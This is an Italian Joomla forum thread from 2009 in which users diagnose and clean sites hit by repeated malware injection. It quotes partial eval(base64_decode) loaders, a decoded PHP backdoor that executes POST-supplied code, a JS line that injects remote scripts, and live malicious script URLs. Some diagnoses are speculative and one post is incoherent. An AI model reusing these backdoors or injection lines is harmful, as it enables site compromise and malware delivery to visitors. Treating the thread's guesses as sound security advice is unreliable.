Joomla.it Forum
Non solo Joomla... => Sicurezza => : alexsupers 12 Oct 2009, 01:50:17
-
il mio sito è stato attaccato :(
non si riesce più ad entrare neanche come amministratore ... qualcuno può aiutarmi
grazie
-
Ciao.
Come fai ad affermare con tanta sicurezza che è stato attaccato? Che problematiche riscontri oltre a non poter accedere al pannello di amministrazione?
Dai un'occhiata a questa guida per risolvere il problema dell'accesso all'amministrazione:
http://wiki.joomla.it/index.php?title=Recupero_password_admin
-
ecco cosa appare
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/landitalia/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/landitalia/configuration.php(1) : eval()'d code on line 1
-
Hai fatto una verifica del file configuration.php via ftp? ed anche dell'integrita degli altri files?
-
lo stiamo facendo ma non si entra neanche via Ftp
-
per cortesia, che versione joomla aventi?
1.5.10 - 1.5.11 ??
-
non riesci neppure ad entrare nel pannello di amministrazione del tuo servizio di hosting?
se così fosse una segnalazione al supporto del tuo servizio di hosting la vedo necessaria
-
Infatti stanno controllando , sembra che è stato cambiato o pasticciato il php
1.5.10
-
hai anche un link al sito attaccato?
-
landitalia.eu
-
ho visto il link al tuo sito. in effetti deve essere stato incluso qualcosa all'interno del configuration.php senza accesso ftp o via file manager del pannello amministrativo del servizio hosting non si può fare nulla.
direi di attendere le verifiche del supporto tecnico dell'hosting a questo punto.
-
secondo voi è possibile un attacco esterno o qualcosa accaduto all' hosting ?
-
Infatti stanno controllando , sembra che è stato cambiato o pasticciato il php
1.5.10
la versione corrente è la 1.5.14 ... spesso chi non aggiorna s ritrova con queste sorprese... :(
-
non penso che sia il problema riguardo all'aggiornamento
-
secondo voi è possibile un attacco esterno o qualcosa accaduto all' hosting ?
diffile stabilirlo a scatola chiusa.
tocca attendere il responso del supporto tecnico dell'hosting
-
81.169.145.91
l'indirizzo ip del tuo hosting funziona...e funzionano anche gli altri siti web ospitati sul medesimio ip.
almeno sappiamo che il problema non è "generale" per chi usa quella macchina...
perche dici che non dipende dalla versione di joomla?
Se è stato hacherato solo il tuo sito o dipende da un componenete non aggiornato o dalla versione di joomla, nella maggior parte dei casi.
Se è stato hacherato il servizio puo dipendere da altri siti web ospitati sulla medesima macchiana...ma considerando che gli altri funzionano...il campo si restringe!
-
dunque ho recuperato gli accessi e ci sono 2 IP che si sono collegati al momento del' attacco , uno subito prima e uno subito dopo , entrambe arrivano dallo stesso server di telecom
Molto probabilmente sono state usate due macchine diverse da una stessa persona. Una per entrare e l'altra per vederne il risultato.
Di solito chi rompe le balle non và nel php ... però tutto è possibile
Aspettiamo il controllo dell' hosting
-
Per l'Hosting và tutto bene >:(
-
Come di consueto l'Hosting si laverà le mani dicendo che usiamo i CMS a nostro rischio e pericolo, poiché sono applicazioni molto a rischio per la sicurezza.
Testuali parole riferitemi dal mio ex-hosting
-
adesso sono nei guai .......... sono riuscito ad entrare via ftp sembra che ci sia tutto ma non capisco cosa è successo
qualcuno sa interpretare la stringa di ritorno quando si accede? per capire dove andare a toccare
-
Comunque come dicevano prima, molto dipende dal mancato aggiornamento di Joomla o di uno dei suoi componenti. Le vulnerabilità di un sito dipendono da quello!
-
potrei aggionarlo ora via ftp che dici ? sarà da fare ?
-
Prova
-
prima dicevo che non penso che sia l'aggiornameno il problema perchè sullo stesso spazio hosting vi sono 2 siti diversi con due istallazioni di joomla diverse . E tutte e due hanno lo stesso problema di accesso
-
Si, però se entrambe le installazioni di Joomla non sono all'ultima versione, 1.5.14 purtroppo non ci vuole molto per estendere l'attacco a tutte e due. Come si diceva prima, potrebbe anche dipendere da un componente non aggiornato, magari il componente potrebbe essere presente in entrambe le installazioni...
-
bene! ora che finalmente hai guadagnato l'accesso ftp si può tentare di fare qualcosa.
L'aggiornamento in questo momento non ti risolverebbe il problema perchè in ogni caso sembra che il file compromesso sia il configuration.php che non devi toccare in caso di aggiornamento.
Per cui veniamo a noi: nella root di joomla hai un file configuration.php-dist che è un file configuration pulito. Scaricalo in locale e modifica le variabili necessarie per il collegamento al database, e le variabili relative ai path. Dopodichè lo carichi sul server e prima rinomini il tuo attuale configuration.php in qualcosa del tipo configuration.php_bak e poi rinonimi il configuration.php-dist in configuration.php e vediamo se si risolvono i problemi. Se è solo compromesso il configuration.php attuale dovresti risolvere.
-
vecchia stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/configuration.php(1) : eval()'d code on line 1
Nuova stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/libraries/joomla/config.php(1) : eval()'d code on line 1
Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.
che roba è?
-
Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.
Quel codice non non deve assolutamente esserci nle configuration.php
e fa riferimento a una parte di codice codificato in base64 che probabilmente attiva o è attivato da qualche altro file che, molto probabilmente, ti hanno caricato sul server.
-
caspita, ma pensa te..
ma un buon vecchio backup non ce l'hai?
-
allora adesso ho la certezza dell'attacco da parte di qualcuno
qualche consiglio ???
è troppo vecchio perdo un sacco di dati se ripristino il Backup
-
caspita mi sa che hanno fatto un bel lavoretto.
mi pare di capire che hanno incluso codice non solo nel configuration.php ma anche in altri file adesso vedo che è chiamato in causa il config.php nella directory libraries/joomla.
la cosa si fa alquanto complicata se è così.
come suggerisce vales un backup ce l'hai?
-
Bah ... non credo che il backup risolva molto, credo che il sito sia compromesso.
in quanto nello stesso backup avremo sempre le estensioni fallate, e magari anche del codicillo malefico in quanto e di solito attacchi del genere vengono effettuati i tempi diversi.
Esempio: un utente si iscrive e carica un'innoquo file immagine o testo camuffato che al 90% dei casi finisce nella cartella images/stories, poi utilizzando magari la stessa falla che gli ha permesso di entrare lui decomprime o rinomina il file, magari lo sposta pure se ha caricato un file che gli permette di usare la shell, e lo esegue ... creando lo scompiglio che molti di noi aihme si son trovati almeno una volta sul proprio sito.
-
riguardo al backup c'è da fare una precisazione: una cosa è il backup di files e cartelle di joomla una cosa è il backup del database.
qui c'è da mantenere la calma è riflettere prima di compiere qualsiasi azione. visto che è impensabile che tu vada a verificare file per file se c'è inserito del codice che non deve esserci a questo punto devi analizzare bene cosa hai installato sul sito come componenti, moduli e plugins aggiuntivi oltre a joomla fatta questa analisi allora si può iniziare a procedere.
-
fai una cosa, prendi tutto il sito e trasportatelo sul tuo pc con xammp, almeno lavori meglio, spulci tra tutti i file e le cartelle, magari con dreamweaver cerchi il file che vuoi in tutta la directory...così potresti trovare qualcosa..
non penso ci siano problemi per il tuo pc, o sbaglio?
ma gli host non fanno di solito qualche backup di tutto il server?
-
riguardo al backup c'è da fare una precisazione: una cosa è il backup di files e cartelle di joomla una cosa è il backup del database.
Gisto ...
però a questo punto metteresti la mano sul fuoco che non abbiano messo del codice nascosto pure all'interno dei contenuti?....
o in altre tabelle del DB.
Ok capita raramente ... ma avere un backup del DB e non dei file prende parecchio tempo poi se si vuol far ricollimare tutto ...
sempre pensando alle estensioni che sono state aggiunte via via.....
Cosa ben diversa sarebbe invece un sisto Joomla liscio .. senza estensioni
il backup dei dati collimerebbe al 99,9% con un'installazione nuova liscia di Joomla.
Segui il consiglio di Valex se intendi lavorare su quei file
-
però a questo punto metteresti la mano sul fuoco che non abbiano messo del codice nascosto pure all'interno dei contenuti?....
o in altre tabelle del DB.
Dici bene. Visto il lavoretto di fino che mi pare abbiano fatto la mano sul fuoco non ce la metto proprio perchè che il rischio di carbonizzarmela :)
Come dice VMB molto dipende dalla complessità del sito in questione. Una cosa è un sito only joomla pulito pulito e ben altra cosa è un sito con installati vari componenti, moduli e plugins e magari anche codice esterno come contatori per statistiche web etc etc
-
allora con calma ..
i siti non hanno registrazione di utenti esterni
però c'è il forum dove è possibile accedere e inserire degli allegati , molto probabilmente sono passati da li
Stò controllando i file esistono molte cartelle con sigle tipo a35db br8c u71a e molte altre, queste cartelle sembrano vuote. Dentro altre si trovano dei file php con la stringa :
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmF zZTY0X2RlY29kZ ecc ecc.
-
scusa ma se prendi il vecchio backup e provi a sostituire solo i vari file di configurazione?
vado a tentativi....
certo se questo risolve sarà temporaneo, dovresti pure eliminare la causa...mmmm...
elimina tutti gli utenti del forum e tutti i file! ;D
-
ci sono molti file index.php che iniziano con il codice
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnVuY3Rpb24gbmF 1K
-
ma questi file index.php si trovano nelle directory di cui parlavi prima?
-
se entri via ftp ricarica un backup, prima salva il configuration.php bacato e vedi la differenza. Hai controllato che tutte le addons (plugin, componenti, moduli) fossero aggiornati?
-
Bene anzi male i siti sono stati compromessi .... :-[
L'attacco è stato troppo ampio , ci sono codici sparsi in più file php
-
Ho recuperato il backup
ho provato a rimetteere su il primo sito,
Il problema è molto complesso penso che sia stato corrotto sql
comunque ora un sito và, apparentemente è tutto ok è stato aggiornato alla 1.5.14 però non riesco a mettere le foto, quando salvo nell'articolo la foto sparisce
c'è qualche funzione nuova ?
-
da backend funziona? saranno i filtri che si impostano nelle preferenze degli articoli, strano però dovrebbe funzionare di default con quella versione..
-
mi spiego meglio, scrivo l'articolo inserisco le foto e le vedo, poi quando salvo l'articolo la foto sparisce
-
Questo delle foto potrebbe essere anche solo un problema di TinyMCE.
A me succedeva qualcosa di simile con l'aggiornamento alla .14 (che guardacaso aggiorna anche l'editor)
Questa particolare situazione l'ho risolta mettendo l'editor JCE
-
infatti io ho aggiornato alla .14 ... ma mi sembra che andava meglio prima
per quanto riguarda l'altro sito penso che sia stato attaccato il db attraverso il forum ...
il sito che è su è questo, spero di averlo salvato, si appoggia ad un altro db
registrostoricolandrover.eu
-
ho istallato JCE ma è sempre la stessa storia le foto le carico ma non si salvano
-
alexsupers un problema un topic, alla soluzione aggiungi la tag risolto al primo titolo e poi via così di seguito..
se questa domanda ha trovato soluzione puoi aggiungere la tag? grazie.
-
Allora la soluzione non c'è perchè ieri sera ho rimesso tutto sù tranne il forum , questa mattina ho ritrovato gli stessi errori, ho 2 siti sullo stesso disco con 2 db diversi, senbra che un db non è corrotto, mentre se uso l'altro mi si ripresenta il problema, lascio solo un sito sù per vedere come và
-
niente da fare ha colpito ancora ........ riescono sempre ad entrare dopo un ora che il sito è su riescono ad entrare e a metterlo KO
ora siamo da capo AIUTO
sono tre anni che lavoro con joomla .. mai successo una cosa del genere
Fatal error: Cannot redeclare f6r() (previously declared in /mnt/web4/53/36/52031736/htdocs/libraries/joomla/database/database.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/components/com_content/helpers/query.php(1) : eval()'d code on line 1
-
avevi cambiato tutte le pass compreso ftp e database?
è la prima cosa da fare.
-
pensi che non l'ho fatto ?
certo
???
-
con un joomla 1.5.14 avevi cambiato tutte le credenziali di accesso, sito, ftp e database e ti sono rientrati dopo un'ora?
e cosa dice ora l'assistenza hosting in merito ti hanno detto come riescono a fare questo miracolo?
-
ma sei sicuro di stare su un server linux e soprattutto di non esser tu a incasinare tutto con i due database?
sono entrambi database del tipo mysql?
-
no guarda che non sono io perchè è tre anni che ci lavoro sopra e mai ho avuto questi problemi
esistono 2 siti diversi che si appoggiano a 2 database diversi. ho fatto la prova e ne ho rimesso su solo uno , quello che pensavo che non aveva problemi e tutto è filato liscio per un ora e il sito era perfetto l'ho anche aggiornato alla 5.14 e l'aggiornamento è andato perfetto
c'è qualcosa che non torna
ora prova a rimmeterlo su con il file di backup, vediamo quanto dura
-
imho non è un attacco ma una siringata di spamm ..
hai qualche contatore installato? prova a toglierlo o ad aggiornalo...
-
contatori di visite? no
qualche scrip ?
tra un'pò getto la spugna
-
comunque un servizio all'esterno magari non aggiornato.. tipo meteo o altro simile..
-
si c'era ma era sull'altro sito che è rimasto out, su quello rimessu su stamattina non c'era
-
da ieri sera il sito và benone, sono state cambiate le pass. del db
se domani ancora và bene cerco di rimmettere sù anche l'altro
Unico problema è il caricamento delle immagini che è impossibile , ma mi sembra che è capitato anche ad altri, spero che l'assistenza riesca a risolvere il problema
-
ma mi sembra che è capitato anche ad altri, spero che l'assistenza riesca a risolvere il problema
insisti con l'assistenza le immagini devono essere salvate perchè joomla è il cms più diffuso al mondo mica un bau bau micio micio!
-
vecchia stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/configuration.php(1) : eval()'d code on line 1
Nuova stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/libraries/joomla/config.php(1) : eval()'d code on line 1
Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.
che roba è?
queste modifiche vengono apportate da bot che fanno parte di una grande botnet con alle spalle dei bei package già configurati per setacciare la rete, violare il sito e modificare.
in quel codice c'è il comando iframe per scaricare in mkodo del tutto silente malware da un server di questa banda di criminali, può essere al 100% che sia solo un server mirrror quindi non il reale che fa da repository.
quando applicano queste modifiche di solito modificano tutti i file acsii presenti nel tuo dominio e noterai che è stato fatto tutto in un ristretto margine temporale quindi solamente da un bot..
avevo avuto un problema simile su un hosting gratuito che poi ha chiuso i servizi ma la piattaforma che usavo era wordpress.
-
in quel codice c'è il comando iframe per scaricare in mkodo del tutto silente malware da un server di questa banda di criminali, può essere al 100% che sia solo un server mirrror quindi non il reale che fa da repository
detta in modo semplice:
accedono al sito passando dalle "porte" aperte ai servizi esterni, capita quando riescono a dirottare le richieste a quei servizi alle loro pagine..
dopo ogni attacco i servizi esterni aggiornano le loro protezioni e si sta tranquilli fino alla prossima volta.
Un sito che non ha installati contatori e altre cose simile è esente da quel pericolo.. fatto sta che chiunque ha segnalato questo tipo di attacco aveva installato uno di quei cosi.
;)
-
ora il sito và , unico problema quello già segnalato in altro post.Contatori non ci sono, pensi che si possa rimettere sù anche l'altro ?
è stato aggiunto su tutti i file acsii un codice lunghissimo.
Ho rimesso su il backup precedente e ora sembra che va, penso che siano passati dal forum,
Per contatori intendi anche Il chi è online di joomla ?
-
pensi che sia stato corrotto il db ?
-
pensi che sia stato corrotto il db ?
basta verificare.. esportalo e poi leggilo con un qualsiasi notepad++ o programma simile..
-
ecco lo script che mi hanno attaccato
src=http://omochacha.com/images/rank5.php
-
Mi aggiungo alla discussione perchè anche il mio sito è stato attaccato. In pratica è un bot che aggiunge nei file php un codice a del tipo
<?php eval(base64_decode( 'aWYoIWlzc2V0KCR... '. Tale codice tradotto diviene if(!isset($s7n1)) {function s7n($s){if(preg_match_all('##is',$s,$a)) foreach($a[0] as $v) if(count(explode("\n",$v))>5) CONTINUA Che al suo interno ha un altra chiamata a base64_decode(). Il cui risultato è <script src=http://sampoong.co.kr/admin/SMALL_UPDIR/index.php ></script>
Tale script poi viene incluso in tutti (o quasi) gli index.html nelle varie cartelle di Joomla. Ho appurato che il link dello script varia per ogni attacco. Ho rimesso su il sito già 4 volte(era già aggiornato all'ultima versione, la 1.5.14), cambiato password (sia del db che dell'administrator), tolto plugin recenti e contatori, sistemato i permessi su cartelle e files, ma il risultato è sempre lo stesso: sito corrotto dopo poche ore.
Inoltre nelle cartelle che contengono foto è presente un file php denominato gifimg.php il cui contenuto è <?php eval(base64_decode('aWYoIWlzc2V0KCR... CODICE'));?>
[code]che tradotto diviene: if(isset($_POST['e'])) eval(base64_decode($_POST['e'])); else die('404 Not Found');
Questo magari dice qualcosa in più sul tipo di attacco...
Facendo un pò di ricerche ho trovato che un risultato simile lo causava un malworm chiamato c99MadShell. Ma nulla che possa risolvere il mio problema.
-
opthnet se proprio devi (ma perchè poi?) contribuire alla diffusione di quella monnezza per cortesia almeno inseriscila nelle tag appropriate, grazie.
-
Tale script poi viene incluso in tutti (o quasi) gli index.html
o index.php che sia..
questo è un comportamento tipico degli spammers che utilizzano la loro monnezza per far salire le proprie discariche nei motori di ricerca..
utilizzano le porte spalancate dei servizi esterni per entrare nel sito, ad esempio i contatori esterni o i servizi meteo..
avitare questi servizi è già una buona precauzione..
altra ottima precauzione è modificare subito tutte le credenziali di accesso, anche quelle del sito e del superadmin ma non solo quelle, anche e soprattutto quelle del databse e dell'ftp..
sposto qui oramai siamo fuori posto.
-
La mia situazione al momento è questa:
Ho rimesso sù anche l'altro sito con all'interno il forum , sono passate più di 24 ore e sembra che vada tutto OK
Se non hai un backup pulito non riesi a risolvere perchè vengono attaccate molte cartelle e molti file php hanno presente quel codice che si riproduce in poco tempo e ti mette Ko il sito.
Io ho fatto cosi:
ho cambiato tutte le pass, comprese quella del Database
Ho bloccato sull' Hosting il sito in modo che non si possa scrivere nelle cartelle dopo che ho fatto il trasferimento del Backup completo, ho lanciato il sito e ancora presentava lo script ( dove si è infettato non sò ) ho controllato il configuration.php ma risultava pulito , ho poi aperto i file che risultavano modificati nella data ( se guardi bene hanno quasi tutti una data , alcuni però risultano modificati con una data più recente ) dentro questi file php c'era il codice malevolo che ho cancellato ( da me grazie al Backup erano solo 4/5 file corrotti ) Ora il sito và ma tengo il sito chiuso sullo spazio Hosting in modo che non si possano scrivere i file.
Vediamo che succede
-
opthnet se proprio devi (ma perchè poi?) contribuire alla diffusione di quella monnezza per cortesia almeno inseriscila nelle tag appropriate, grazie.
Semplicemente perchè se qualcuno ha questo problema, usando il motore di ricerca possa trovare questa discussione. Quindi, con l'aiuto di più persone, risolvere il problema...
x alexsupers. Cosa intendi ho bloccato sull' hosting il sito?
x56francesco. negli index.html inserisce lo script, mentre in quelli php del codice. Ma non solo. Modifica anche i files con estensione .js aggiungendo la seguente ultima riga:
document.write('<script src= LINK.php ><\/script>');
Ripeto che ho modificato le credenziali d'accesso e che ho rimosso i contatori, nonchè pulito tutti i files infetti ripristinando da un backup. Quindi al massimo è un plugin con qualche bug o un attacco dal servizio di hosting. Io uso ******.
-
sul mio hosting c'è la funzione di bloccare la scrittura delle cartelle , naturalmente qaulcuna deve rimanere libera se nò il sito non funziona
Ti confermo che il sito mi funziona da ieri abbastanza bene
-
Penso di aver risolto. Il problema quasi sicuramente era la password ftp. Una volta modificata, non ho più subito attacchi. La cosa strana è che, se veramente avevano la mia password, perchè hanno fatto un simile attacco? Il mio sospetto è che dipenda dal servizio di hosting, perchè pensandoci avevo avuto già problemi (anche se differenti da questo).
-
x56francesco. negli index.html inserisce lo script, mentre in quelli php del codice.
ovvio,
Il problema quasi sicuramente era la password ftp. Una volta modificata, non ho più subito attacchi
basta cambiarla spesso, è una ottima norma di sicurezza,
è comunque un comportamento tipico degli spammers che utilizzano le porte aperte nei siti per utilizzare programmi esterni come contatori e simili..
anche non utilizzare questi servizi è una ottima regola di sicurezza nota a tutto il web da quasi un decennio..
qualcuno dice che molti di quei servizi sono (o almeno erano perchè sono info che conosco da tanto tempo) essi stessi spammers, e del resto perchè escluderlo? visto che la lotta per salire nei motori di ricerca non esclude alcun colpo proibito (quando qualcuno paga ovviamente)
-
vi racconto in breve
tutto incomincia con un plugin chiamato jfirewall=joomla firewall che lo trovi su scriptmafia kuando te installi il plugin lui si installa ma se te lo attivi lui ti da direct access is allowed e nn c'e nnt che puoi fare infatti gli hacker del sito della gelmini del sito della postepay italia oppure quelli che sono entrati nellla email della presidentessa
Sara Palin ecc sono esperti in materia perchè un parte di siti come la securealive.net ed simili devono far pagare il loro plugin sulla sicurezza joomla sicurezza del server sicurezza del codice php html css ecc cioe io vedo php code protection se paga tot dollari Joomla Secure 197dollari per citarvi alcuni plugin perchè sto mondo di protezione deve essere a pagamento?
-
Scusa lasvegas, ma si capisce 1 parola si e 3 no di quello che hai scritto...
Visto che è un forum in italiano e non in qualche slang ti invito (da utente a utente) a usare un italiano più comprensibile.
Grazie
-
HO RISOLTO, non era attacco ma manutenzione dell'hosting
Ciao a tutti
ho letto le 4 pagine del post quindi mi sono fatto quanto meno l'idea di come poi procedere nel caso si riveli un vero attacco e non un disservizio dell'hosting.
Dunque, io gestisco e curo due siti, www.coltivando-archivi.com e www.lahautecorniche.com. sul primo ho lavorato fino a ieri sera, ftp ok ma non lasciava modificare configuration.php dal pannello amministratore, (dovevo togliere gli url friendly) anche con dati FTP giusti. A parte quello avevo installato il modulo savira photogallery, funzionante.
Stamattina faccio un controllo e provo ad applicare una intuizione. al momento di salvare le impostazioni del modulo savira, il tutto si grippa, non carica più e dopo un poco mi esce unable to connect database mysql...
provando a ricaricare la pagina una volta su 3 mi si mostrava il sito poi da allora più nulla, non si collega. per giunta è sparito anche l'altro. per giunta l'hosting non mi risponde.
E' attacco o disservizio?
dispongo di backup manuali aggiornati, cambia solo il template ma quello non mi importa, è cosa veloce (magari il probleme è lì, il template è pjo-joomlaforall)
Per prevenire risposte già date ecco cosa farò:
1_provo a vedere se via ftp riesco a parlare ai database
2_se funzionano, in locale mi aggiorno i siti all'ultima versione (da 1.5.10_coltivando-archivi; da 1.5.12_lahautecorniche a 1.5.14) Basta sovrascrivere i file? esiste una guida wiki per l'aggionamento?
3_sono aperto a consigli.
Grazie, spero che non sia nulla...di grave.
-
Anch'io ho lo stesso problema di opthnet: nonostante continui a cancellari gli script dai files, mi si ripresentano con link a siti diversi... non esiste soluzione? Probablmente c'è un file che danneggia sempre tutto. Fino a che non si elimina il problema persisterà.
-
hai cambiato le credenziali di accesso (tutte database ed ftp comprese) ed eliminato tutti i servizi esterni? contatori e simili...